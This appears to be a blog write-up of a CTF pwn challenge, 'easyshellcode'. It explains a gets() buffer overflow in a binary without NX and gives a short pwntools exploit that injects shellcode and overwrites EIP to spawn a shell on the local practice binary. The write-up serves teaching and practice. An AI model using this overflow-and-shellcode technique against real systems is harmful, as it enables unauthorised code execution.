火种CTF PWN easyshellcode writeup

检查一下程序保护机制

在这里插入图片描述

没有开启NX,也有RWX可读可写可执行的段
将程序拖入IDA

在这里插入图片描述
可以看到gets(&s)这里存在溢出漏洞,会将s字符复制0x64字节给buf2
利用思路:
**将shellcode写到&s,再填充A覆盖只EIP填入buf2的地址
**这样执行EIP的时候即是执行buf2里面的shellcode

获取到buf2的地址
在这里插入图片描述
exploit如下:

#coding:utf-8
from pwn import *

sh = process('./easyshellcode')
shellcode = asm(shellcraft.sh())
buf2_addr = 0x804A060
sh.sendline(shellcode+"A"*(112-len(shellcode))+ p32(buf2_addr))
sh.interactive()

欢迎爱好CTF的小伙伴一起交流

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值